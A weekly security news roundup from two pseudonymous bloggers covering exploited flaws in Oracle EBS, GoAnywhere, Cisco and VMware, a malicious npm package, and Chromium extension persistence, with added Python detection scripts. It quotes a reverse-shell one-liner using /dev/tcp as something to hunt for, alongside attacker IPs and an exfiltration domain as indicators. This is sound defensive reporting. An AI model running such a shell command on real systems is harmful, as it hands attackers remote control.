Perimeter Pyromania, Middleware Meltdowns, and a Phantom in Your Browser

This week felt like a greatest-hits playlist you didn’t ask for: pre-auth RCE in Oracle EBS, GoAnywhere back in the spotlight (again), Cisco edge gear under active fire, and a VMware zero-day that quietly lived rent-free for almost a year. Sprinkle in a malicious npm package siphoning your password reset emails, a browser extension backdoor that doesn’t need the Chrome Web Store, KEV-listed BMCs, and the ticking clock on Windows 10 EOL. Coffee up.

Biggest Exploits of the Week

Oracle E-Business Suite pre-auth RCE chain abused by Cl0p (patch now)

UncleSp1d3r: Oracle dropped an emergency Security Alert for CVE-2025-61882, a pre-auth RCE chain living in EBS’ Concurrent Processing/BI Publisher integration, and it’s already in Cl0p’s hands for data theft. The chain gives unauthenticated remote code execution on internet-facing EBS — not a great place to be shipping payroll and PII. Oracle has patches; apply now, isolate those front ends, and hunt for classic one-liner shells like sh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 and suspicious egress to known IOCs (e.g., 200.107.207.26, 185.181.60.11). Details and IOCs: Oracle Security Alert, watchTowr, Rapid7, Tenable, BleepingComputer.

Plain-English takeaway: If your EBS is on the internet, take it off the internet. Patch, segment, rotate creds, and plan for incident response if you see anomalies.

Fortra GoAnywhere MFT max-sev RCE continues to burn

UncleSp1d3r: Because of course it was GoAnywhere again. CVE-2025-10035 is a CVSS 10 deserialization pre-auth RCE in the License Servlet that’s been actively exploited since September. Expect ransomware and data exfil on exposed MFTs. Patches are out; block exposure, limit to trusted IPs/VPN, and hunt for shells, scheduled tasks, and large outbound transfers. Sources: Fortra advisory, watchTowr, Rapid7, Microsoft, BleepingComputer.

Takeaway: Treat internet-facing MFTs as emergency patch/hunt targets. If you can’t patch today, take them dark and gate through VPN/jumps.

Cisco edge devices under active exploitation (ArcaneDoor keeps knocking)

KryptoKat: Cisco disclosed multiple zero-days across ASA/FTD and IOS families (CVE-2025-20333, CVE-2025-20362) with active exploitation linked to ArcaneDoor/UAT4356. Successful attacks include RCE, privilege escalation, and even disabling logging — the kind of thing that makes SOCs suddenly very quiet for all the wrong reasons. Apply hotfixes, restrict management planes to allow-listed sources, and monitor for “why is logging off?” moments, anomalous VPNs, and odd outbound connections. Read up: Cisco: Continued Attacks, Tenable, Unit42, SecurityWeek.

Takeaway: Your perimeter is part of your critical compute, not an appliance-shaped afterthought. Patch it like production.

VMware Tools LPE exploited for almost a year

UncleSp1d3r: CVE-2025-41244 is a local privilege escalation in VMware Tools and Aria Operations components that a China-linked actor reportedly abused since October 2024. From unprivileged user to root on guest VMs is all the runway you need for persistent implants and lateral movement. Patch Tools/open-vm-tools fleetwide, capture telemetry on guest privilege changes, and hunt for rogue services, SUID binaries, and new systemd units. Sources: Broadcom advisory, NVISO, DarkReading, BleepingComputer.

Takeaway: “Just a guest VM” is where attackers move the furniture. Patch, then hunt.

Breach Corner: Lessons That Hurt

CISA confirms GeoServer RCE used to breach a federal agency

KryptoKat: Attackers popped a public-facing GeoServer with CVE-2024-36401 (eval-injection to RCE), dropped ChinaChopper, tunneled with Stowaway, and scanned with fscan. They lived there for about three weeks thanks to patching delays and spotty EDR/SOC coverage — a sensibly dull postmortem you can implement today. Patch GeoServer, remove public exposure of admin bits, enable EDR on app servers, and hunt for shells and Redfish-adjacent weirdness. Read: CISA advisory, DarkReading, BleepingComputer, SecurityWeek, GeoTools advisory.

Takeaway: KEV means “patch yesterday.” Running public apps without EDR is a budget decision with breach-shaped outcomes.

Supply Chain & Ecosystem Oddities

Malicious npm “postmark-mcp” silently BCC’d your secrets

KryptoKat: A rogue npm package “postmark-mcp” (malicious 1.0.16) quietly added a hidden BCC to outbound emails — including password resets and security notifications — to an attacker domain (giftshop.club). If you wired MCP/AI automations into email workflows, assume credential and token exposure, purge the package, and rotate everything it touched. Investigate build pipelines and mail logs for unexpected BCCs and notify users where appropriate. Sources: Koi Security, Snyk, BleepingComputer, The Hacker News, Postmark notice, DarkReading.

Takeaway: “Unofficial” connectors are unofficial for a reason. Pin versions, enforce provenance, and treat AI/MCP connectors like third-party code with inbox access — because that’s exactly what they are.
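The mail-log hunt suggested above, as an added illustration (not code from the Koi Security or Postmark write-ups). It assumes Postfix-style delivery lines of the form `<queue-id>: to=<address>` and that a transactional message such as a password reset should have exactly one recipient; the sample log lines are constructed.

```python
"""Spot hidden-BCC style leakage in MTA logs. Added illustration, not from
the Koi Security/Postmark write-ups. Assumes Postfix-style delivery lines of
the form '<queue-id>: to=<address>'; one transactional message (password
reset, security notice) should have exactly one recipient."""
import re
from collections import defaultdict
from typing import Dict, FrozenSet, List, Set

TO_RE = re.compile(r"(?P<qid>[0-9A-F]+): to=<(?P<rcpt>[^>]+)>")

# Constructed sample: message 7B1C3A silently copies giftshop.club.
SAMPLE_LOG = """\
Oct  6 09:01:10 mta postfix/smtp[4012]: 7B1C3A: to=<alice@example.com>, status=sent
Oct  6 09:01:10 mta postfix/smtp[4013]: 7B1C3A: to=<inbox@giftshop.club>, status=sent
Oct  6 09:02:44 mta postfix/smtp[4014]: 9D4E21: to=<bob@example.com>, status=sent
Oct  6 09:03:02 mta postfix/smtp[4015]: C0FFEE: to=<drop@giftshop.club>, status=sent
"""

def recipients_by_message(log: str) -> Dict[str, Set[str]]:
    """Group every delivered recipient under its queue ID."""
    rcpts: Dict[str, Set[str]] = defaultdict(set)
    for line in log.splitlines():
        m = TO_RE.search(line)
        if m:
            rcpts[m.group("qid")].add(m.group("rcpt").lower())
    return rcpts

def find_hidden_bcc(log: str, watch_domains: FrozenSet[str] = frozenset()) -> Dict[str, List[str]]:
    """Return {queue_id: sorted recipients} for messages that either fanned
    out to more than one recipient or reached a watched domain."""
    hits: Dict[str, List[str]] = {}
    for qid, addrs in recipients_by_message(log).items():
        watched = [a for a in addrs if a.rsplit("@", 1)[-1] in watch_domains]
        if len(addrs) > 1 or watched:
            hits[qid] = sorted(addrs)
    return hits

if __name__ == "__main__":
    for qid, addrs in find_hidden_bcc(SAMPLE_LOG, frozenset({"giftshop.club"})).items():
        print(qid, addrs)
```

Run it against real MTA logs with your own domain on the watch-list removed and the multi-recipient rule scoped to the queue IDs of your transactional sender.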

Phantom Extension: stealth-loading Chromium extensions without the store

UncleSp1d3r: Synacktiv showed you can persist arbitrary unpacked extensions on Windows by forging preferences and MACs derived from resources.pak, no store install required. The “phantom” extension can loot cookies and tokens, hijack SSO, and glide across cloud apps with valid sessions. Blue teams: watch for non-browser processes touching Preferences/Secure Preferences, sudden extensions.developer_mode flips, and odd extension IDs; lock down extension policies via GPO/HKLM. Read: Synacktiv research, extloader tooling.

Takeaway: The browser is the new shell. Treat extension policies and profile file integrity as first-class controls.
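The profile-file checks described above, as an added example (not Synacktiv's or Chromium's code). It assumes the usual Preferences layout where `extensions.settings` is keyed by extension ID, store installs record a relative `path` under the profile while unpacked extensions record an absolute one, and `extensions.developer_mode` is a boolean; the allow-list and sample JSON are constructed.

```python
"""Audit a Chromium Preferences/Secure Preferences JSON for side-loaded
extensions. Added illustration, not Synacktiv's or Chromium's code.
Assumptions: extensions.settings is keyed by extension ID; store installs
record a relative 'path' under the profile while unpacked extensions
record an absolute path; extensions.developer_mode is a boolean."""
import json
import re
from typing import Dict, List

# Chrome extension IDs are 32 characters drawn from a-p.
ID_RE = re.compile(r"^[a-p]{32}$")
# Matches a Windows drive path or a POSIX absolute path.
ABS_PATH_RE = re.compile(r"^([A-Za-z]:\\|/)")

# Hypothetical corporate allow-list of extension IDs (constructed values).
ALLOWLIST = {"abcdefghijklmnopabcdefghijklmnop"}

def audit_preferences(prefs: Dict) -> List[str]:
    """Return human-readable findings; an empty list means nothing odd."""
    findings: List[str] = []
    ext = prefs.get("extensions", {})
    if ext.get("developer_mode"):
        findings.append("developer_mode enabled")
    for ext_id, entry in ext.get("settings", {}).items():
        if not ID_RE.match(ext_id):
            findings.append(f"malformed extension id: {ext_id}")
        if ext_id not in ALLOWLIST:
            findings.append(f"not in allow-list: {ext_id}")
        path = entry.get("path", "")
        if ABS_PATH_RE.match(path):
            findings.append(f"unpacked extension (absolute path): {ext_id} -> {path}")
    return findings

# Constructed sample: one sanctioned store install plus a side-loaded one.
SAMPLE_PREFS = json.loads(r'''{
  "extensions": {
    "developer_mode": true,
    "settings": {
      "abcdefghijklmnopabcdefghijklmnop": {"path": "abcdefghijklmnopabcdefghijklmnop\\1.2.3_0"},
      "ponmlkjihgfedcbaponmlkjihgfedcba": {"path": "C:\\Users\\Public\\phantom"}
    }
  }
}''')

if __name__ == "__main__":
    for finding in audit_preferences(SAMPLE_PREFS):
        print(finding)
```

Point it at each user's `Preferences` and `Secure Preferences` on a schedule and alert on any non-empty result; pair it with a file-integrity watch on those two files so edits by non-browser processes surface too.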

KEV-listed AMI MegaRAC BMC flaw: scan, patch, segment

KryptoKat: Community Nuclei templates landed for CVE-2024-54085, an auth bypass in the Redfish Host Interface for MegaRAC SPx BMCs. Use them judiciously (authorized targets only) to find exposures, but the real work is firmware updates and putting BMCs on locked-down management networks with strict allow-lists. References: CISA KEV, Eclypsium, NVD, Reddit post.

Takeaway: BMCs aren’t “out of band” to attackers. They’re a shortcut to your firmware.

Vendor Patch Roundup: Mind Your File Parsers

KryptoKat: Cisco Talos disclosed several code-execution bugs that are already patched:

  • NVIDIA developer tools: cuobjdump and nvdisasm bugs (CVE-2025-23339, CVE-2025-23338, CVE-2025-23340, CVE-2025-23271, CVE-2025-23308) allow RCE via crafted ELF/fatbin inputs. Dev machines are crown jewels; sandbox untrusted samples and update toolchains.
  • Adobe Acrobat Reader: a use-after-free (CVE-2025-54257) enabling RCE via malicious PDFs. Update endpoints and lean on mail/file sandboxing.

Talos has Snort rules; vendors have updates: Talos blog, NVIDIA bulletin.

Takeaway: Your parsers are a perimeter. Treat CI and developer workstations like prod and stop double-clicking mystery PDFs.

Identity & Policy Watch

MFA fatigue still works if you let it

KryptoKat: An anonymized post-incident analysis from UK retail shows the same grubby combo — vishing, credential stuffing, SIM/device attacks, and push-bombing — ending in account takeover and lateral movement. The cure is unglamorous: phishing-resistant MFA (FIDO2/WebAuthn), rate-limiting MFA prompts, conditional access (device health, geo, impossible travel), and turning off legacy auth. Summary: Incident analysis.

Takeaway: If your users can be pushed into approval, attackers can push harder. Hardware-backed MFA shuts the door politely and firmly.
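One way to implement the prompt rate-limiting mentioned above, as an added example (not from the cited incident analysis). It assumes an IdP hook that calls `should_send_push()` before every push and `record_response()` after the user answers; the thresholds are illustrative.

```python
"""Push-prompt rate limiter against MFA fatigue ('push-bombing'). Added
illustration, not from the cited incident analysis. Assumes an IdP hook
calls should_send_push() before each push and record_response() after."""
import time
from collections import defaultdict, deque
from typing import Deque, Dict, Optional, Tuple

class PushGuard:
    def __init__(self, max_prompts: int = 3, window_s: int = 300, lock_s: int = 900):
        self.max_prompts = max_prompts      # prompts allowed per window
        self.window_s = window_s            # sliding window in seconds
        self.lock_s = lock_s                # lockout after abuse or a denial
        self._prompts: Dict[str, Deque[float]] = defaultdict(deque)
        self._locked_until: Dict[str, float] = {}

    def should_send_push(self, user: str, now: Optional[float] = None) -> Tuple[bool, str]:
        """Decide whether another push may go out; returns (allowed, reason)."""
        now = time.time() if now is None else now
        if self._locked_until.get(user, 0) > now:
            return False, "locked: recent push-bombing or explicit denial"
        q = self._prompts[user]
        while q and now - q[0] > self.window_s:   # drop prompts outside the window
            q.popleft()
        if len(q) >= self.max_prompts:
            # Too many prompts in the window: stop pushing, lock, and let the
            # caller fall back to a phishing-resistant factor (FIDO2/WebAuthn).
            self._locked_until[user] = now + self.lock_s
            return False, "rate limit: too many prompts; escalate to phishing-resistant factor"
        q.append(now)
        return True, "ok"

    def record_response(self, user: str, approved: bool, now: Optional[float] = None) -> None:
        """A user tapping 'deny' is a strong signal; lock immediately and
        clear the window so the next attempt starts from the lockout."""
        now = time.time() if now is None else now
        if not approved:
            self._locked_until[user] = now + self.lock_s
            self._prompts[user].clear()

if __name__ == "__main__":
    guard = PushGuard()
    for _ in range(4):
        print(guard.should_send_push("demo-user"))
```

Wire the "locked" and "rate limit" outcomes to a SOC alert as well as to the user-facing fallback, since a burst of prompts is itself evidence the password is already compromised.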

Windows 10 EOL is next week’s problem… until it isn’t

KryptoKat: Windows 10 reaches end of support on October 14, 2025. Unsupported endpoints become magnetized for exploit chains and ransomware operators. Inventory, isolate, migrate to Windows 11 or buy ESUs, and pile on compensating controls (EDR, allowlisting, strict firewalling, MFA). Details: Microsoft Support, Lifecycle, context via DarkReading.

Takeaway: Legacy endpoints are technical debt with interest. Pay down or pay out.

  • Edge and management plane are hot: Cisco ASA/FTD zero-days and KEV-listed BMCs underline that admin interfaces are prime targets.
  • Middleware and MFT remain soft underbellies: Oracle EBS and GoAnywhere show how business plumbing turns into breach plumbing.
  • Client surfaces are back in play: browser extension persistence and dev tool parsers are reliable footholds.
  • Identity is still the skeleton key: MFA fatigue persists until you deploy phishing-resistant factors.

Monday Morning Playbook

  • Oracle EBS (CVE-2025-61882): Patch immediately, remove direct internet exposure, hunt for shells and egress to Oracle IOCs; rotate service accounts and keys. Oracle advisory
  • GoAnywhere (CVE-2025-10035): Patch and gate behind VPN/allow-lists; hunt for ransomware staging, scheduled tasks, and large transfers. Fortra advisory
  • Cisco ASA/FTD/IOS (CVE-2025-20333, CVE-2025-20362): Apply hotfixes, lock management planes, enable remote logging, and monitor for ArcaneDoor TTPs. Cisco guidance
  • VMware Tools (CVE-2025-41244): Patch Tools/open-vm-tools, then hunt for persistence on guests (root services, SUIDs, new units). Broadcom advisory
  • GeoServer (CVE-2024-36401): Patch, add EDR to app servers, and scan for ChinaChopper/Stowaway artifacts. CISA advisory
  • postmark-mcp npm: Rip-and-replace; rotate exposed tokens/credentials; search mail logs for BCC to giftshop.club. Postmark notice
  • Chromium hardening: Enforce extension allow-lists via GPO, monitor preference file integrity, and disable developer mode for users. Synacktiv
  • BMCs (CVE-2024-54085): Update firmware, segment management networks, and use vetted scanners carefully. NVD
  • Patch NVIDIA/Adobe: Update CUDA toolchains and Acrobat Reader; sandbox file processing; deploy Talos Snort rules. Talos
  • Identity: Move to FIDO2/WebAuthn and rate-limit MFA prompts; disable legacy auth.

Closing Thoughts

UncleSp1d3r: Perimeters don’t save you if the perimeter is the target. Patch the edge, hide your middleware, and remember: if it processes files from the internet, it’s a compute workload, not a convenience.

KryptoKat: As Jane Austen almost wrote, it is a truth universally acknowledged that an unpatched appliance in possession of a public IP must be in want of an incident. Be kind to Future You: patch this week, segment forever, and bring cookies to the SOC.

— Kat & Sp1d3r, logging off before the next “emergency advisory” hits the inbox